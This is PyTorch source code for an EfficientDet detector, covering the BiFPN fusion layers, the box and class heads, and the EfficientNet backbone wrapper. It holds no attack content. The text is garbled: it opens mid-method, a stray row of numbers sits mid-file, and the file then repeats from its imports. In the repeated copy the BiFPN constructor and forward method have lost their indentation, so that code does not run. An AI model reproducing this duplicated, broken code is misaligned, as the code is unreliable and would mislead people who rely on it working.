            p3_out = self.conv3_up(self.swish(weight[0] * p3_in + weight[1] * self.p3_upsample(p4_td)))
            # Simple attention: weighs p4_in_2, p4_up and p3_out.
            p4_w2 = self.p4_w2_relu(self.p4_w2)
            weight = p4_w2 / (torch.sum(p4_w2, dim=0) + self.epsilon)
            p4_out = self.conv4_down(
                self.swish(weight[0] * p4_in_2 + weight[1] * p4_td+ weight[2] * self.p4_downsample(p3_out)))
            # Simple attention: weighs p5_in_2, p5_up and p4_out.
            p5_w2 = self.p5_w2_relu(self.p5_w2)
            weight = p5_w2 / (torch.sum(p5_w2, dim=0) + self.epsilon)
            p5_out = self.conv5_down(
                self.swish(weight[0] * p5_in_2 + weight[1] * p5_td+ weight[2] * self.p5_downsample(p4_out)))
            # Simple attention: weighs p6_in, p6_up and p5_out.
            p6_w2 = self.p6_w2_relu(self.p6_w2)
            weight = p6_w2 / (torch.sum(p6_w2, dim=0) + self.epsilon)
            p6_out = self.conv6_down(
                self.swish(weight[0] * p6_in + weight[1] * p6_td+ weight[2] * self.p6_downsample(p5_out)))
            # Simple attention: weighs p7_in against p6_out.
            p7_w2 = self.p7_w2_relu(self.p7_w2)
            weight = p7_w2 / (torch.sum(p7_w2, dim=0) + self.epsilon)
            p7_out = self.conv7_down(self.swish(weight[0] * p7_in + weight[1] * self.p7_downsample(p6_out)))
        else:
            p3_in, p4_in, p5_in, p6_in, p7_in = inputs
            # Simple attention: weighs p7_in against p6_in.
            p6_w1 = self.p6_w1_relu(self.p6_w1)
            weight = p6_w1 / (torch.sum(p6_w1, dim=0) + self.epsilon)
            p6_td= self.conv6_up(self.swish(weight[0] * p6_in + weight[1] * self.p6_upsample(p7_in)))
            # Simple attention: weighs p6_up against p5_in.
            p5_w1 = self.p5_w1_relu(self.p5_w1)
            weight = p5_w1 / (torch.sum(p5_w1, dim=0) + self.epsilon)
            p5_td= self.conv5_up(self.swish(weight[0] * p5_in + weight[1] * self.p5_upsample(p6_td)))
            # Simple attention: weighs p5_up against p4_in.
            p4_w1 = self.p4_w1_relu(self.p4_w1)
            weight = p4_w1 / (torch.sum(p4_w1, dim=0) + self.epsilon)
            p4_td= self.conv4_up(self.swish(weight[0] * p4_in + weight[1] * self.p4_upsample(p5_td)))
            # Simple attention: weighs p4_up against p3_in.
            p3_w1 = self.p3_w1_relu(self.p3_w1)
            weight = p3_w1 / (torch.sum(p3_w1, dim=0) + self.epsilon)
            p3_out = self.conv3_up(self.swish(weight[0] * p3_in + weight[1] * self.p3_upsample(p4_td)))
            # Simple attention: weighs p4_in, p4_up and p3_out.
            p4_w2 = self.p4_w2_relu(self.p4_w2)
            weight = p4_w2 / (torch.sum(p4_w2, dim=0) + self.epsilon)
            p4_out = self.conv4_down(
                self.swish(weight[0] * p4_in + weight[1] * p4_td+ weight[2] * self.p4_downsample(p3_out)))
            # Simple attention: weighs p5_in, p5_up and p4_out.
            p5_w2 = self.p5_w2_relu(self.p5_w2)
            weight = p5_w2 / (torch.sum(p5_w2, dim=0) + self.epsilon)
            p5_out = self.conv5_down(
                self.swish(weight[0] * p5_in + weight[1] * p5_td+ weight[2] * self.p5_downsample(p4_out)))
            # Simple attention: weighs p6_in, p6_up and p5_out.
            p6_w2 = self.p6_w2_relu(self.p6_w2)
            weight = p6_w2 / (torch.sum(p6_w2, dim=0) + self.epsilon)
            p6_out = self.conv6_down(
                self.swish(weight[0] * p6_in + weight[1] * p6_td+ weight[2] * self.p6_downsample(p5_out)))
            # Simple attention: weighs p7_in against p6_out.
            p7_w2 = self.p7_w2_relu(self.p7_w2)
            weight = p7_w2 / (torch.sum(p7_w2, dim=0) + self.epsilon)
            p7_out = self.conv7_down(self.swish(weight[0] * p7_in + weight[1] * self.p7_downsample(p6_out)))
        return p3_out, p4_out, p5_out, p6_out, p7_out

    def _forward(self, inputs):
        # The unweighted _forward path is used when phi = 6, 7.
        if self.first_time:
            # The first BiFPN round needs downsampling / channel reduction
            # to obtain p3_in, p4_in, p5_in, p6_in, p7_in.
            p3, p4, p5 = inputs
            p3_in = self.p3_down_channel(p3)
            p4_in_1 = self.p4_down_channel(p4)
            p4_in_2 = self.p4_down_channel_2(p4)
            p5_in_1 = self.p5_down_channel(p5)
            p5_in_2 = self.p5_down_channel_2(p5)
            p6_in = self.p5_to_p6(p5)
            p7_in = self.p6_to_p7(p6_in)
            p6_td= self.conv6_up(self.swish(p6_in + self.p6_upsample(p7_in)))
            p5_td= self.conv5_up(self.swish(p5_in_1 + self.p5_upsample(p6_td)))
            p4_td= self.conv4_up(self.swish(p4_in_1 + self.p4_upsample(p5_td)))
            p3_out = self.conv3_up(self.swish(p3_in + self.p3_upsample(p4_td)))
            p4_out = self.conv4_down(
                self.swish(p4_in_2 + p4_td+ self.p4_downsample(p3_out)))
            p5_out = self.conv5_down(
                self.swish(p5_in_2 + p5_td+ self.p5_downsample(p4_out)))
            p6_out = self.conv6_down(
                self.swish(p6_in + p6_td+ self.p6_downsample(p5_out)))
            p7_out = self.conv7_down(self.swish(p7_in + self.p7_downsample(p6_out)))
        else:
            p3_in, p4_in, p5_in, p6_in, p7_in = inputs
            p6_td= self.conv6_up(self.swish(p6_in + self.p6_upsample(p7_in)))
            p5_td= self.conv5_up(self.swish(p5_in + self.p5_upsample(p6_td)))
            p4_td= self.conv4_up(self.swish(p4_in + self.p4_upsample(p5_td)))
            p3_out = self.conv3_up(self.swish(p3_in + self.p3_upsample(p4_td)))
            p4_out = self.conv4_down(
                self.swish(p4_in + p4_td+ self.p4_downsample(p3_out)))
            p5_out = self.conv5_down(
                self.swish(p5_in + p5_td+ self.p5_downsample(p4_out)))
            p6_out = self.conv6_down(
                self.swish(p6_in + p6_td+ self.p6_downsample(p5_out)))
            p7_out = self.conv7_down(self.swish(p7_in + self.p7_downsample(p6_out)))
        return p3_out, p4_out, p5_out, p6_out, p7_out
class BoxNet(nn.Module):
    """Box-regression head shared across the five pyramid levels.

    The convolution weights are shared between levels; only the BatchNorm
    layers are level specific.  Outputs 4 regression values per anchor.
    """

    def __init__(self, in_channels, num_anchors, num_layers, onnx_export=False):
        super(BoxNet, self).__init__()
        self.num_layers = num_layers
        self.conv_list = nn.ModuleList(
            [SeparableConvBlock(in_channels, in_channels, norm=False, activation=False) for i in range(num_layers)])
        # Each of the five feature levels gets its own BatchNorm stack.
        self.bn_list = nn.ModuleList(
            [nn.ModuleList([nn.BatchNorm2d(in_channels, momentum=0.01, eps=1e-3) for i in range(num_layers)]) for j in range(5)])
        # num_anchors = 9 boxes per location,
        # 4 values each (center offsets and width/height).
        self.header = SeparableConvBlock(in_channels, num_anchors * 4, norm=False, activation=False)
        self.swish = MemoryEfficientSwish() if not onnx_export else Swish()

    def forward(self, inputs):
        feats = []
        # Loop over the feature levels.
        for feat, bn_list in zip(inputs, self.bn_list):
            # Each level goes through num_layers rounds of conv + BN + Swish.
            for i, bn, conv in zip(range(self.num_layers), bn_list, self.conv_list):
                feat = conv(feat)
                feat = bn(feat)
                feat = self.swish(feat)
            feat = self.header(feat)
            # Reshape to (batch, num_boxes, 4).
            feat = feat.permute(0, 2, 3, 1)
            feat = feat.contiguous().view(feat.shape[0], -1, 4)
            feats.append(feat)
        # Concatenate the predictions from all levels.
        feats = torch.cat(feats, dim=1)
        return feats
class ClassNet(nn.Module):
    """Classification head shared across the five pyramid levels.

    The convolution weights are shared between levels; only the BatchNorm
    layers are level specific.  Outputs per-class sigmoid probabilities
    for every anchor.
    """

    def __init__(self, in_channels, num_anchors, num_classes, num_layers, onnx_export=False):
        super(ClassNet, self).__init__()
        self.num_anchors = num_anchors
        self.num_classes = num_classes
        self.num_layers = num_layers
        self.conv_list = nn.ModuleList(
            [SeparableConvBlock(in_channels, in_channels, norm=False, activation=False) for i in range(num_layers)])
        # Each of the five feature levels gets its own BatchNorm stack.
        self.bn_list = nn.ModuleList(
            [nn.ModuleList([nn.BatchNorm2d(in_channels, momentum=0.01, eps=1e-3) for i in range(num_layers)]) for j in range(5)])
        # num_anchors = 9
        # One score per anchor per class: num_anchors * num_classes outputs.
        self.header = SeparableConvBlock(in_channels, num_anchors * num_classes, norm=False, activation=False)
        self.swish = MemoryEfficientSwish() if not onnx_export else Swish()

    def forward(self, inputs):
        feats = []
        # Loop over the feature levels.
        for feat, bn_list in zip(inputs, self.bn_list):
            for i, bn, conv in zip(range(self.num_layers), bn_list, self.conv_list):
                # Each level goes through num_layers rounds of conv + BN + Swish.
                feat = conv(feat)
                feat = bn(feat)
                feat = self.swish(feat)
            feat = self.header(feat)
            # Reshape to (batch, num_boxes, num_classes).
            feat = feat.permute(0, 2, 3, 1)
            feat = feat.contiguous().view(feat.shape[0], feat.shape[1], feat.shape[2], self.num_anchors, self.num_classes)
            feat = feat.contiguous().view(feat.shape[0], -1, self.num_classes)
            feats.append(feat)
        # Concatenate the predictions from all levels.
        feats = torch.cat(feats, dim=1)
        # Apply sigmoid so the outputs represent per-class probabilities.
        feats = feats.sigmoid()
        return feats
class EfficientNet(nn.Module):
    """EfficientNet backbone stripped of its classification head.

    Wraps a (optionally pretrained) EfficientNet and exposes only the
    intermediate feature maps needed by the BiFPN.
    """

    def __init__(self, phi, load_weights=False):
        super(EfficientNet, self).__init__()
        model = EffNet.from_pretrained(f'efficientnet-b{phi}', load_weights)
        # Drop the classification head; only the feature extractor is kept.
        del model._conv_head
        del model._bn1
        del model._avg_pooling
        del model._dropout
        del model._fc
        self.model = model

    def forward(self, x):
        x = self.model._conv_stem(x)
        x = self.model._bn0(x)
        x = self.model._swish(x)
        feature_maps = []
        last_x = None
        for idx, block in enumerate(self.model._blocks):
            # Drop-connect rate scales linearly with block depth.
            drop_connect_rate = self.model._global_params.drop_connect_rate
            if drop_connect_rate:
                drop_connect_rate *= float(idx) / len(self.model._blocks)
            x = block(x, drop_connect_rate=drop_connect_rate)
            #------------------------------------------------------#
            #   Collect the effective feature maps: if an
            #   EfficientBlock has stride 2, its *previous* block's
            #   output is an effective feature map; additionally, the
            #   output of the final EfficientBlock is one as well.
            #------------------------------------------------------#
            if block._depthwise_conv.stride == [2, 2]:
                feature_maps.append(last_x)
            elif idx == len(self.model._blocks) - 1:
                feature_maps.append(x)
            last_x = x
        del last_x
        return feature_maps[1:]
class EfficientDetBackbone(nn.Module):
    """Full EfficientDet network: backbone + BiFPN + regression/class heads."""

    def __init__(self, num_classes=80, phi=0, load_weights=False):
        super(EfficientDetBackbone, self).__init__()
        #--------------------------------#
        #   phi selects the EfficientDet
        #   variant (D0..D7).
        #--------------------------------#
        self.phi = phi
        #---------------------------------------------------#
        #   backbone_phi maps each EfficientDet variant to
        #   its EfficientNet backbone version.
        #---------------------------------------------------#
        self.backbone_phi = [0, 1, 2, 3, 4, 5, 6, 6]
        #--------------------------------#
        #   Number of channels used in
        #   the BiFPN.
        #--------------------------------#
        self.fpn_num_filters = [64, 88, 112, 160, 224, 288, 384, 384]
        #--------------------------------#
        #   How many times the BiFPN
        #   layer is repeated.
        #--------------------------------#
        self.fpn_cell_repeats = [3, 4, 5, 6, 7, 7, 8, 8]
        #---------------------------------------------------#
        #   Number of conv repeats in the Efficient Head.
        #---------------------------------------------------#
        self.box_class_repeats = [3, 3, 3, 4, 4, 4, 5, 5]
        #---------------------------------------------------#
        #   Base anchor scale.
        #---------------------------------------------------#
        self.anchor_scale = [4., 4., 4., 4., 4., 4., 4., 5.]
        num_anchors = 9
        # Channel counts of the backbone's C3/C4/C5 outputs per variant.
        conv_channel_coef = {
            0: [40, 112, 320],
            1: [40, 112, 320],
            2: [48, 120, 352],
            3: [48, 136, 384],
            4: [56, 160, 448],
            5: [64, 176, 512],
            6: [72, 200, 576],
            7: [72, 200, 576],
        }
        #------------------------------------------------------#
        #   After stacking several BiFPN modules we obtain the
        #   fpn_features.  For efficientdet-D0 these are five
        #   effective feature levels:
        #   P3_out  64,64,64
        #   P4_out  32,32,64
        #   P5_out  16,16,64
        #   P6_out  8,8,64
        #   P7_out  4,4,64
        #------------------------------------------------------#
        self.bifpn = nn.Sequential(
            *[BiFPN(self.fpn_num_filters[self.phi],
                    conv_channel_coef[phi],
                    True if _ == 0 else False,
                    attention=True if phi < 6 else False)
              for _ in range(self.fpn_cell_repeats[phi])])
        self.num_classes = num_classes
        #------------------------------------------------------#
        #   Create the efficient head, which turns the feature
        #   levels into box and class predictions.
        #------------------------------------------------------#
        self.regressor = BoxNet(in_channels=self.fpn_num_filters[self.phi], num_anchors=num_anchors,
                                num_layers=self.box_class_repeats[self.phi])
        self.classifier = ClassNet(in_channels=self.fpn_num_filters[self.phi], num_anchors=num_anchors,
                                   num_classes=num_classes, num_layers=self.box_class_repeats[self.phi])
        self.anchors = Anchors(anchor_scale=self.anchor_scale[phi])
        #-------------------------------------------#
        #   The backbone yields three effective
        #   feature levels (shapes for D0 input):
        #   C3  64, 64, 40
        #   C4  32, 32, 112
        #   C5  16, 16, 320
        #-------------------------------------------#
        self.backbone_net = EfficientNet(self.backbone_phi[phi], load_weights)

    def freeze_bn(self):
        """Puts every BatchNorm2d layer into eval mode (freezes its stats)."""
        for m in self.modules():
            if isinstance(m, nn.BatchNorm2d):
                m.eval()

    def forward(self, inputs):
        """Runs the full detector; returns features, box regressions,
        class probabilities and the anchor boxes."""
        _, p3, p4, p5 = self.backbone_net(inputs)
        features = (p3, p4, p5)
        features = self.bifpn(features)
        regression = self.regressor(features)
        classification = self.classifier(features)
        anchors = self.anchors(inputs)
        return features, regression, classification, anchors
| 42.636691 | 129 | 0.531047 | import torch
import torch.nn as nn
from utils.anchors import Anchors
from nets.efficientnet import EfficientNet as EffNet
from nets.layers import (Conv2dStaticSamePadding, MaxPool2dStaticSamePadding,
MemoryEfficientSwish, Swish)
class SeparableConvBlock(nn.Module):
    """Depthwise-separable convolution (Xception style): a 3x3 depthwise
    conv followed by a 1x1 pointwise conv, with optional BatchNorm and
    Swish activation.  Spatial size is preserved."""

    def __init__(self, in_channels, out_channels=None, norm=True, activation=False, onnx_export=False):
        super(SeparableConvBlock, self).__init__()
        if out_channels is None:
            out_channels = in_channels
        # groups=in_channels makes the 3x3 conv depthwise; the 1x1 conv
        # then mixes channels (and carries the bias).
        self.depthwise_conv = Conv2dStaticSamePadding(in_channels, in_channels,
                                                      kernel_size=3, stride=1, groups=in_channels, bias=False)
        self.pointwise_conv = Conv2dStaticSamePadding(in_channels, out_channels, kernel_size=1, stride=1)
        self.norm = norm
        if self.norm:
            self.bn = nn.BatchNorm2d(num_features=out_channels, momentum=0.01, eps=1e-3)
        self.activation = activation
        if self.activation:
            # The plain Swish is used for ONNX export compatibility.
            self.swish = MemoryEfficientSwish() if not onnx_export else Swish()

    def forward(self, x):
        x = self.depthwise_conv(x)
        x = self.pointwise_conv(x)
        if self.norm:
            x = self.bn(x)
        if self.activation:
            x = self.swish(x)
        return x
class BiFPN(nn.Module):
def __init__(self, num_channels, conv_channels, first_time=False, epsilon=1e-4, onnx_export=False, attention=True):
super(BiFPN, self).__init__()
self.epsilon = epsilon
self.conv6_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv5_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv4_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv3_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv4_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv5_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv6_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv7_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.p6_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p5_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p4_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p3_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p4_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p5_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p6_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p7_downsample = MaxPool2dStaticSamePadding(3, 2)
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
self.first_time = first_time
if self.first_time:
self.p5_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p4_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[1], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p3_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[0], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p5_to_p6 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
MaxPool2dStaticSamePadding(3, 2)
)
self.p6_to_p7 = nn.Sequential(
MaxPool2dStaticSamePadding(3, 2)
)
self.p4_down_channel_2 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[1], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p5_down_channel_2 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p6_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p6_w1_relu = nn.ReLU()
self.p5_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p5_w1_relu = nn.ReLU()
self.p4_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p4_w1_relu = nn.ReLU()
self.p3_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p3_w1_relu = nn.ReLU()
self.p4_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p4_w2_relu = nn.ReLU()
self.p5_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p5_w2_relu = nn.ReLU()
self.p6_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p6_w2_relu = nn.ReLU()
self.p7_w2 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p7_w2_relu = nn.ReLU()
self.attention = attention
def forward(self, inputs):
if self.attention:
p3_out, p4_out, p5_out, p6_out, p7_out = self._forward_fast_attention(inputs)
else:
p3_out, p4_out, p5_out, p6_out, p7_out = self._forward(inputs)
return p3_out, p4_out, p5_out, p6_out, p7_out
    def _forward_fast_attention(self, inputs):
        """Top-down then bottom-up fusion with fast normalized attention.

        Each fusion node combines its incoming maps with learnable
        non-negative weights w, normalized as ``w / (sum(w) + epsilon)``
        (EfficientDet's softmax-free "fast attention"), then applies swish
        and a separable conv.

        Parameters
        ----------
        inputs :
            When ``self.first_time`` is set: the raw backbone maps
            ``(p3, p4, p5)``; P6/P7 are derived here and P3-P5 are projected
            to the BiFPN channel width. Otherwise: the previous cell's five
            maps ``(p3_in, p4_in, p5_in, p6_in, p7_in)``.

        Returns
        -------
        tuple
            The fused pyramid ``(p3_out, p4_out, p5_out, p6_out, p7_out)``.
        """
        if self.first_time:
            p3, p4, p5 = inputs
            # Project backbone maps to the BiFPN width. P4/P5 get a second,
            # independent projection because each is consumed twice: once on
            # the top-down path and once as a bottom-up skip connection.
            p3_in = self.p3_down_channel(p3)
            p4_in_1 = self.p4_down_channel(p4)
            p4_in_2 = self.p4_down_channel_2(p4)
            p5_in_1 = self.p5_down_channel(p5)
            p5_in_2 = self.p5_down_channel_2(p5)
            # P6/P7 are synthesized from P5 by strided pooling.
            p6_in = self.p5_to_p6(p5)
            p7_in = self.p6_to_p7(p6_in)
            # ---- Top-down pathway: P7 -> P6 -> P5 -> P4 -> P3 ----
            # Two-input nodes: current level + upsampled coarser level.
            p6_w1 = self.p6_w1_relu(self.p6_w1)
            weight = p6_w1 / (torch.sum(p6_w1, dim=0) + self.epsilon)
            p6_td= self.conv6_up(self.swish(weight[0] * p6_in + weight[1] * self.p6_upsample(p7_in)))
            p5_w1 = self.p5_w1_relu(self.p5_w1)
            weight = p5_w1 / (torch.sum(p5_w1, dim=0) + self.epsilon)
            p5_td= self.conv5_up(self.swish(weight[0] * p5_in_1 + weight[1] * self.p5_upsample(p6_td)))
            p4_w1 = self.p4_w1_relu(self.p4_w1)
            weight = p4_w1 / (torch.sum(p4_w1, dim=0) + self.epsilon)
            p4_td= self.conv4_up(self.swish(weight[0] * p4_in_1 + weight[1] * self.p4_upsample(p5_td)))
            p3_w1 = self.p3_w1_relu(self.p3_w1)
            weight = p3_w1 / (torch.sum(p3_w1, dim=0) + self.epsilon)
            p3_out = self.conv3_up(self.swish(weight[0] * p3_in + weight[1] * self.p3_upsample(p4_td)))
            # ---- Bottom-up pathway: P3 -> P4 -> P5 -> P6 -> P7 ----
            # Three-input nodes: skip connection + top-down intermediate +
            # downsampled finer level.
            p4_w2 = self.p4_w2_relu(self.p4_w2)
            weight = p4_w2 / (torch.sum(p4_w2, dim=0) + self.epsilon)
            p4_out = self.conv4_down(
                self.swish(weight[0] * p4_in_2 + weight[1] * p4_td+ weight[2] * self.p4_downsample(p3_out)))
            p5_w2 = self.p5_w2_relu(self.p5_w2)
            weight = p5_w2 / (torch.sum(p5_w2, dim=0) + self.epsilon)
            p5_out = self.conv5_down(
                self.swish(weight[0] * p5_in_2 + weight[1] * p5_td+ weight[2] * self.p5_downsample(p4_out)))
            p6_w2 = self.p6_w2_relu(self.p6_w2)
            weight = p6_w2 / (torch.sum(p6_w2, dim=0) + self.epsilon)
            p6_out = self.conv6_down(
                self.swish(weight[0] * p6_in + weight[1] * p6_td+ weight[2] * self.p6_downsample(p5_out)))
            # P7 has no coarser input on the bottom-up path: two-input node.
            p7_w2 = self.p7_w2_relu(self.p7_w2)
            weight = p7_w2 / (torch.sum(p7_w2, dim=0) + self.epsilon)
            p7_out = self.conv7_down(self.swish(weight[0] * p7_in + weight[1] * self.p7_downsample(p6_out)))
        else:
            # Subsequent cells: the pyramid is already at BiFPN width, so no
            # channel projections; same two-pass fusion as above.
            p3_in, p4_in, p5_in, p6_in, p7_in = inputs
            # ---- Top-down pathway ----
            p6_w1 = self.p6_w1_relu(self.p6_w1)
            weight = p6_w1 / (torch.sum(p6_w1, dim=0) + self.epsilon)
            p6_td= self.conv6_up(self.swish(weight[0] * p6_in + weight[1] * self.p6_upsample(p7_in)))
            p5_w1 = self.p5_w1_relu(self.p5_w1)
            weight = p5_w1 / (torch.sum(p5_w1, dim=0) + self.epsilon)
            p5_td= self.conv5_up(self.swish(weight[0] * p5_in + weight[1] * self.p5_upsample(p6_td)))
            p4_w1 = self.p4_w1_relu(self.p4_w1)
            weight = p4_w1 / (torch.sum(p4_w1, dim=0) + self.epsilon)
            p4_td= self.conv4_up(self.swish(weight[0] * p4_in + weight[1] * self.p4_upsample(p5_td)))
            p3_w1 = self.p3_w1_relu(self.p3_w1)
            weight = p3_w1 / (torch.sum(p3_w1, dim=0) + self.epsilon)
            p3_out = self.conv3_up(self.swish(weight[0] * p3_in + weight[1] * self.p3_upsample(p4_td)))
            # ---- Bottom-up pathway ----
            p4_w2 = self.p4_w2_relu(self.p4_w2)
            weight = p4_w2 / (torch.sum(p4_w2, dim=0) + self.epsilon)
            p4_out = self.conv4_down(
                self.swish(weight[0] * p4_in + weight[1] * p4_td+ weight[2] * self.p4_downsample(p3_out)))
            p5_w2 = self.p5_w2_relu(self.p5_w2)
            weight = p5_w2 / (torch.sum(p5_w2, dim=0) + self.epsilon)
            p5_out = self.conv5_down(
                self.swish(weight[0] * p5_in + weight[1] * p5_td+ weight[2] * self.p5_downsample(p4_out)))
            p6_w2 = self.p6_w2_relu(self.p6_w2)
            weight = p6_w2 / (torch.sum(p6_w2, dim=0) + self.epsilon)
            p6_out = self.conv6_down(
                self.swish(weight[0] * p6_in + weight[1] * p6_td+ weight[2] * self.p6_downsample(p5_out)))
            p7_w2 = self.p7_w2_relu(self.p7_w2)
            weight = p7_w2 / (torch.sum(p7_w2, dim=0) + self.epsilon)
            p7_out = self.conv7_down(self.swish(weight[0] * p7_in + weight[1] * self.p7_downsample(p6_out)))
        return p3_out, p4_out, p5_out, p6_out, p7_out
    def _forward(self, inputs):
        """Top-down then bottom-up fusion with plain (unweighted) addition.

        Same wiring as :meth:`_forward_fast_attention` but every fusion node
        is a simple sum of its inputs followed by swish and a separable
        conv — no learnable attention weights.

        Parameters
        ----------
        inputs :
            ``(p3, p4, p5)`` backbone maps when ``self.first_time`` is set,
            otherwise the previous cell's five pyramid maps.

        Returns
        -------
        tuple
            ``(p3_out, p4_out, p5_out, p6_out, p7_out)``.
        """
        if self.first_time:
            p3, p4, p5 = inputs
            # Project backbone maps to the BiFPN width; P4/P5 are projected
            # twice because they feed both the top-down and bottom-up paths.
            p3_in = self.p3_down_channel(p3)
            p4_in_1 = self.p4_down_channel(p4)
            p4_in_2 = self.p4_down_channel_2(p4)
            p5_in_1 = self.p5_down_channel(p5)
            p5_in_2 = self.p5_down_channel_2(p5)
            # P6/P7 derived from P5 by strided pooling.
            p6_in = self.p5_to_p6(p5)
            p7_in = self.p6_to_p7(p6_in)
            # Top-down pathway: P7 -> P6 -> P5 -> P4 -> P3.
            p6_td= self.conv6_up(self.swish(p6_in + self.p6_upsample(p7_in)))
            p5_td= self.conv5_up(self.swish(p5_in_1 + self.p5_upsample(p6_td)))
            p4_td= self.conv4_up(self.swish(p4_in_1 + self.p4_upsample(p5_td)))
            p3_out = self.conv3_up(self.swish(p3_in + self.p3_upsample(p4_td)))
            # Bottom-up pathway: P3 -> P4 -> P5 -> P6 -> P7 (skip + td + down).
            p4_out = self.conv4_down(
                self.swish(p4_in_2 + p4_td+ self.p4_downsample(p3_out)))
            p5_out = self.conv5_down(
                self.swish(p5_in_2 + p5_td+ self.p5_downsample(p4_out)))
            p6_out = self.conv6_down(
                self.swish(p6_in + p6_td+ self.p6_downsample(p5_out)))
            p7_out = self.conv7_down(self.swish(p7_in + self.p7_downsample(p6_out)))
        else:
            # Subsequent cells: inputs are already at BiFPN width.
            p3_in, p4_in, p5_in, p6_in, p7_in = inputs
            # Top-down pathway.
            p6_td= self.conv6_up(self.swish(p6_in + self.p6_upsample(p7_in)))
            p5_td= self.conv5_up(self.swish(p5_in + self.p5_upsample(p6_td)))
            p4_td= self.conv4_up(self.swish(p4_in + self.p4_upsample(p5_td)))
            p3_out = self.conv3_up(self.swish(p3_in + self.p3_upsample(p4_td)))
            # Bottom-up pathway.
            p4_out = self.conv4_down(
                self.swish(p4_in + p4_td+ self.p4_downsample(p3_out)))
            p5_out = self.conv5_down(
                self.swish(p5_in + p5_td+ self.p5_downsample(p4_out)))
            p6_out = self.conv6_down(
                self.swish(p6_in + p6_td+ self.p6_downsample(p5_out)))
            p7_out = self.conv7_down(self.swish(p7_in + self.p7_downsample(p6_out)))
        return p3_out, p4_out, p5_out, p6_out, p7_out
class BoxNet(nn.Module):
    """Box-regression head applied to all five pyramid levels.

    The separable-conv weights are shared across levels; each level keeps
    its own BatchNorm layers (hence the 5 x num_layers ``bn_list``).
    """

    def __init__(self, in_channels, num_anchors, num_layers, onnx_export=False):
        """
        Args:
            in_channels: channel count of every BiFPN feature map.
            num_anchors: anchors per spatial location.
            num_layers: number of conv/BN/swish blocks before the header.
            onnx_export: use the ONNX-exportable Swish implementation.
        """
        super(BoxNet, self).__init__()
        self.num_layers = num_layers
        # One conv stack, shared by all pyramid levels.
        self.conv_list = nn.ModuleList(
            [SeparableConvBlock(in_channels, in_channels, norm=False, activation=False)
             for _ in range(num_layers)])
        # Per-level BatchNorm: feature statistics differ between levels, so
        # norms are not shared (5 levels x num_layers).
        self.bn_list = nn.ModuleList(
            [nn.ModuleList([nn.BatchNorm2d(in_channels, momentum=0.01, eps=1e-3)
                            for _ in range(num_layers)])
             for _ in range(5)])
        # Final conv predicts 4 box deltas per anchor.
        self.header = SeparableConvBlock(in_channels, num_anchors * 4, norm=False, activation=False)
        self.swish = Swish() if onnx_export else MemoryEfficientSwish()

    def forward(self, inputs):
        """Return box regressions of shape (batch, total_anchors, 4)."""
        feats = []
        for feat, bn_list in zip(inputs, self.bn_list):
            # Shared conv weights, level-specific BatchNorm. bn_list and
            # conv_list both hold num_layers entries, so the explicit
            # zip(range(num_layers), ...) index of the original was unused.
            for bn, conv in zip(bn_list, self.conv_list):
                feat = self.swish(bn(conv(feat)))
            feat = self.header(feat)
            # (B, C, H, W) -> (B, H, W, C) -> (B, H*W*num_anchors, 4)
            feat = feat.permute(0, 2, 3, 1)
            feat = feat.contiguous().view(feat.shape[0], -1, 4)
            feats.append(feat)
        # Concatenate the per-level predictions along the anchor axis.
        feats = torch.cat(feats, dim=1)
        return feats
class ClassNet(nn.Module):
    """Classification head applied to all five pyramid levels.

    Mirrors BoxNet: conv weights shared across levels, per-level BatchNorm.
    """

    def __init__(self, in_channels, num_anchors, num_classes, num_layers, onnx_export=False):
        """
        Args:
            in_channels: channel count of every BiFPN feature map.
            num_anchors: anchors per spatial location.
            num_classes: number of object classes.
            num_layers: number of conv/BN/swish blocks before the header.
            onnx_export: use the ONNX-exportable Swish implementation.
        """
        super(ClassNet, self).__init__()
        self.num_anchors = num_anchors
        self.num_classes = num_classes
        self.num_layers = num_layers
        # One conv stack, shared by all pyramid levels.
        self.conv_list = nn.ModuleList(
            [SeparableConvBlock(in_channels, in_channels, norm=False, activation=False)
             for _ in range(num_layers)])
        # Per-level BatchNorm (5 levels x num_layers).
        self.bn_list = nn.ModuleList(
            [nn.ModuleList([nn.BatchNorm2d(in_channels, momentum=0.01, eps=1e-3)
